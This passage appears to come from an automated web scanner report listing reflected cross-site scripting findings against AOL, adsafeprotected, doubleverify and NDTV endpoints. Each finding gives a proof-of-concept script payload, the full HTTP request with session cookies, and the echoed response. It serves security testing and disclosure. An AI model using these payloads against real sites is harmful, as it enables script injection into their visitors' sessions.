Last-Modified: Sun, 04 Sep 2011 11:14:18 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai50d49"-alert(1)-"3ed32da4bcd/daa.php?action_id=3&participant_id=2&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName
...[SNIP]...

6.151. http://nai.tacoda.at.atwola.com/nai/daa.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://nai.tacoda.at.atwola.com
Path:	/nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa787"-alert(1)-"41da85397bf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /nai/daa.phpfa787"-alert(1)-"41da85397bf?action_id=3&participant_id=2&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675 HTTP/1.1
Host: nai.tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: eadx=x; ATTACID=a3Z0aWQ9MTc2NWlmdTFha2tjNzk=; ANRTT=; TData=99999|^; N=2:b2269f69029173967deb3f16e3a72f92,b2269f69029173967deb3f16e3a72f92; ATTAC=a3ZzZWc9OTk5OTk6

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:15:04 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:15:04 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
lamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai/daa.phpfa787"-alert(1)-"41da85397bf?action_id=3&participant_id=2&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
...[SNIP]...

6.152. http://pixel.adsafeprotected.com/jspix [anId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.adsafeprotected.com
Path:	/jspix

Issue detail

The value of the anId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5008"-alert(1)-"1bf4169bb16 was submitted in the anId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /jspix?anId=140d5008"-alert(1)-"1bf4169bb16&pubId=11479&campId=4726 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://web.adblade.com/impsc.php?cid=1083-2742610312&output=html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=DF6CC77EAEA9BC24AC2E7E96F398F579; Path=/
Content-Type: text/javascript
Date: Sun, 04 Sep 2011 02:39:45 GMT
Connection: close

var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://web.adblade.com/impsc.php?cid=1083-2742610312&output=html",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=140d5008"-alert(1)-"1bf4169bb16&pubId=11479&campId=4726",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   asid : "gsnryweo"
};

(function(){var N="3.12";var v=(adsafeVisParams.debug==="true");var n=2000;var H
...[SNIP]...

6.153. http://pixel.adsafeprotected.com/jspix [campId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.adsafeprotected.com
Path:	/jspix

Issue detail

The value of the campId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fccdb"-alert(1)-"d25d36213ca was submitted in the campId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /jspix?anId=140&pubId=11479&campId=4726fccdb"-alert(1)-"d25d36213ca HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://web.adblade.com/impsc.php?cid=1083-2742610312&output=html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=EAC9C268E0448B35476A295A27B68B7D; Path=/
Content-Type: text/javascript
Date: Sun, 04 Sep 2011 02:39:47 GMT
Connection: close

var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://web.adblade.com/impsc.php?cid=1083-2742610312&output=html",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=140&pubId=11479&campId=4726fccdb"-alert(1)-"d25d36213ca",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   asid : "gsnryxpe"
};

(function(){var N="3.12";var v=(adsafeVisParams.debug==="true");var n=2000;var H={INFO:"info",LOG:"log",
...[SNIP]...

6.154. http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.adsafeprotected.com
Path:	/jspix

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8e56"-alert(1)-"acc731f922d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /jspix?anId=140&pubId=11479&campId=4726&d8e56"-alert(1)-"acc731f922d=1 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://web.adblade.com/impsc.php?cid=1083-2742610312&output=html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=271FCB86246BD89C54F8347D56F41E27; Path=/
Content-Type: text/javascript
Date: Sun, 04 Sep 2011 02:39:47 GMT
Connection: close

var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://web.adblade.com/impsc.php?cid=1083-2742610312&output=html",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=140&pubId=11479&campId=4726&d8e56"-alert(1)-"acc731f922d=1",
   debug : "false",
   allowPhoneHome : "true",
   phoneHomeDelay : "3000",
   asid : "gsnryydy"
};

(function(){var N="3.12";var v=(adsafeVisParams.debug==="true");var n=2000;var H={INFO:"info",LOG:"log"
...[SNIP]...

6.155. http://pixel.adsafeprotected.com/jspix [pubId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.adsafeprotected.com
Path:	/jspix

Issue detail

The value of the pubId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6f98"-alert(1)-"55928a9ab42 was submitted in the pubId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /jspix?anId=140&pubId=11479b6f98"-alert(1)-"55928a9ab42&campId=4726 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://web.adblade.com/impsc.php?cid=1083-2742610312&output=html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=331450ED87CFF9A066AA4D3E74250177; Path=/
Content-Type: text/javascript
Date: Sun, 04 Sep 2011 02:39:46 GMT
Connection: close

var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://web.adblade.com/impsc.php?cid=1083-2742610312&output=html",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=140&pubId=11479b6f98"-alert(1)-"55928a9ab42&campId=4726",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   asid : "gsnryx15"
};

(function(){var N="3.12";var v=(adsafeVisParams.debug==="true");var n=2000;var H={INFO:"info
...[SNIP]...

6.156. http://rtb0.doubleverify.com/rtb.ashx/verifyc [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://rtb0.doubleverify.com
Path:	/rtb.ashx/verifyc

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload d1849<script>alert(1)</script>2f38dc06f94 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rtb.ashx/verifyc?ctx=741233&cmp=5641720&plc=68132397&sid=265920&num=5&ver=2&dv_url=http%3A//adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1165705968@Top%3F&callback=__verify_callback_217917795060d1849<script>alert(1)</script>2f38dc06f94 HTTP/1.1
Host: rtb0.doubleverify.com
Proxy-Connection: keep-alive
Referer: http://cdn.optmd.com/V2/88918/233260/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=2733665-13225b1b58a-2854b473-10; __utma=209764608.1020985525.1314892399.1314892399.1314892399.1; __utmz=209764608.1314892399.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:267-HSA-807&token:_mch-doubleverify.com-1314892398926-27601

Response

HTTP/1.1 200 OK
Connection: close
Content-Type: text/javascript; charset=utf-8
Server: Microsoft-IIS/7.0
Date: Sun, 04 Sep 2011 02:39:44 GMT
Content-Length: 74

__verify_callback_217917795060d1849<script>alert(1)</script>2f38dc06f94(2)

6.157. http://social.ndtv.com/NDTVProfit [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://social.ndtv.com
Path:	/NDTVProfit

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e899"><script>alert(1)</script>f30e055d08d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /NDTVProfit?6e899"><script>alert(1)</script>f30e055d08d=1 HTTP/1.1
Host: social.ndtv.com
Proxy-Connection: keep-alive
Referer: http://social.ndtv.com/home.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=165355488.441276387.1315103188.1315103188.1315103188.1; __utmb=165355488.4.10.1315103194; __utmc=165355488; __utmz=165355488.1315103194.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bangkok%20thailand%20news; _SUPERFLY_nosample=1; PHPSESSID=06690e83b26d060ea9197b90799f6b1f; __utma=126395663.1992920947.1315103192.1315103192.1315103192.1; __utmb=126395663.5.10.1315103192; __utmc=126395663; __utmz=126395663.1315103192.1.1.utmcsr=ndtv.com|utmccn=(referral)|utmcmd=referral|utmcct=/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142; _chartbeat2=efl9lo3odsxv1y4d

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny10
Content-Length: 62213
Expires: Sun, 04 Sep 2011 03:39:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 03:39:25 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:
...[SNIP]...
<a href="/NDTVProfit&6e899"><script>alert(1)</script>f30e055d08d=1&page=2">
...[SNIP]...

6.158. http://social.ndtv.com/groups.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://social.ndtv.com
Path:	/groups.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83e36"><script>alert(1)</script>6ca4221099d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /groups.php?83e36"><script>alert(1)</script>6ca4221099d=1 HTTP/1.1
Host: social.ndtv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny10
Expires: Sun, 04 Sep 2011 04:19:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 04:19:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 60108

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:
...[SNIP]...
<fb:like href="http://social.ndtv.com/groups.php?83e36"><script>alert(1)</script>6ca4221099d=1" send="true" layout="box_count" width="100" show_faces="false" action="recommend" font="arial">
...[SNIP]...

6.159. http://social.ndtv.com/home.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://social.ndtv.com
Path:	/home.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df4e4"><script>alert(1)</script>b631d811bfb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /home.php?df4e4"><script>alert(1)</script>b631d811bfb=1 HTTP/1.1
Host: social.ndtv.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=126395663.1992920947.1315103192.1315103192.1315103192.1; __utmb=126395663.4.10.1315103192; __utmc=126395663; __utmz=126395663.1315103192.1.1.utmcsr=ndtv.com|utmccn=(referral)|utmcmd=referral|utmcct=/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142; __utma=165355488.441276387.1315103188.1315103188.1315103188.1; __utmb=165355488.4.10.1315103194; __utmc=165355488; __utmz=165355488.1315103194.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bangkok%20thailand%20news; _chartbeat2=efl9lo3odsxv1y4d; _SUPERFLY_nosample=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny10
Content-Length: 22754
Expires: Sun, 04 Sep 2011 03:32:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 03:32:52 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:
...[SNIP]...
<fb:like href="http://social.ndtv.com/home.php?df4e4"><script>alert(1)</script>b631d811bfb=1" send="true" layout="box_count" width="100" show_faces="false" action="recommend" font="arial">
...[SNIP]...

6.160. http://social.ndtv.com/static/Comment/Form/ [ctype parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://social.ndtv.com
Path:	/static/Comment/Form/

Issue detail

The value of the ctype request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload acfa9</script><script>alert(1)</script>4078a43edf7 was submitted in the ctype parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /static/Comment/Form/?&key=ae42a4f016dd1fdd208110a097b061a4&link=http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia%2F48-hours-on-mumbai-airport-s-main-runway-still-shut-131142&title=48+hours+on%2C+Mumbai+airport%27s+main+runway+still+shut&ctype=storyacfa9</script><script>alert(1)</script>4078a43edf7&identifier=story-131142 HTTP/1.1
Host: social.ndtv.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Pragma: no-cache
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny10
Content-Length: 14432
Cache-Control: must-revalidate, max-age=300, post-check=0, pre-check=0
Date: Sun, 04 Sep 2011 02:43:20 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
';
params += '&title=' + '48 hours on, Mumbai airport\'s main runway still shut';
params += '&identifier=' + 'story-131142';
params += '&ctype=' + 'storyacfa9</script><script>alert(1)</script>4078a43edf7';
params += '&site=' + 'ndtv';

if(!o.cache){
params += '&rm=' + Math.random();
params += '&tt=' + (new Date).getTime();

...[SNIP]...

6.161. http://social.ndtv.com/static/Comment/Form/ [ctype parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://social.ndtv.com
Path:	/static/Comment/Form/

Issue detail

The value of the ctype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aab7e"><script>alert(1)</script>21b611b7d8d was submitted in the ctype parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /static/Comment/Form/?&key=ae42a4f016dd1fdd208110a097b061a4&link=http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia%2F48-hours-on-mumbai-airport-s-main-runway-still-shut-131142&title=48+hours+on%2C+Mumbai+airport%27s+main+runway+still+shut&ctype=storyaab7e"><script>alert(1)</script>21b611b7d8d&identifier=story-131142 HTTP/1.1
Host: social.ndtv.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Pragma: no-cache
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny10
Content-Length: 14419
Cache-Control: must-revalidate, max-age=300, post-check=0, pre-check=0
Date: Sun, 04 Sep 2011 02:43:18 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<input type="hidden" name="ctype" value="storyaab7e"><script>alert(1)</script>21b611b7d8d"/>
...[SNIP]...

6.162. http://social.ndtv.com/static/Comment/Form/ [identifier parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://social.ndtv.com
Path:	/static/Comment/Form/

Issue detail

The value of the identifier request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fec6d"><script>alert(1)</script>9da80c086d6 was submitted in the identifier parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /static/Comment/Form/?&key=ae42a4f016dd1fdd208110a097b061a4&link=http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia%2F48-hours-on-mumbai-airport-s-main-runway-still-shut-131142&title=48+hours+on%2C+Mumbai+airport%27s+main+runway+still+shut&ctype=story&identifier=story-131142fec6d"><script>alert(1)</script>9da80c086d6 HTTP/1.1
Host: social.ndtv.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Pragma: no-cache
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny10
Content-Length: 14419
Cache-Control: must-revalidate, max-age=300, post-check=0, pre-check=0
Date: Sun, 04 Sep 2011 02:43:24 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<input type="hidden" name="identifier" value="story-131142fec6d"><script>alert(1)</script>9da80c086d6"/>
...[SNIP]...

6.163. http://social.ndtv.com/static/Comment/Form/ [identifier parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://social.ndtv.com
Path:	/static/Comment/Form/

Issue detail

The value of the identifier request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27bb1</script><script>alert(1)</script>543e86c15a9 was submitted in the identifier parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /static/Comment/Form/?&key=ae42a4f016dd1fdd208110a097b061a4&link=http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia%2F48-hours-on-mumbai-airport-s-main-runway-still-shut-131142&title=48+hours+on%2C+Mumbai+airport%27s+main+runway+still+shut&ctype=story&identifier=story-13114227bb1</script><script>alert(1)</script>543e86c15a9 HTTP/1.1
Host: social.ndtv.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Pragma: no-cache
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny10
Content-Length: 14432
Cache-Control: must-revalidate, max-age=300, post-check=0, pre-check=0
Date: Sun, 04 Sep 2011 02:43:26 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
-mumbai-airport-s-main-runway-still-shut-131142';
params += '&title=' + '48 hours on, Mumbai airport\'s main runway still shut';
params += '&identifier=' + 'story-13114227bb1</script><script>alert(1)</script>543e86c15a9';
params += '&ctype=' + 'story';
params += '&site=' + 'ndtv';

if(!o.cache){
params += '&rm=' + Math.random();
p
...[SNIP]...

6.164. http://social.ndtv.com/static/Comment/Form/ [link parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://social.ndtv.com
Path:	/static/Comment/Form/

Issue detail

The value of the link request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 84f35'%3balert(1)//3ee7c09651 was submitted in the link parameter. This input was echoed as 84f35';alert(1)//3ee7c09651 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /static/Comment/Form/?&key=ae42a4f016dd1fdd208110a097b061a4&link=http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia%2F48-hours-on-mumbai-airport-s-main-runway-still-shut-13114284f35'%3balert(1)//3ee7c09651&title=48+hours+on%2C+Mumbai+airport%27s+main+runway+still+shut&ctype=story&identifier=story-131142 HTTP/1.1
Host: social.ndtv.com
Proxy-Connection: keep-alive
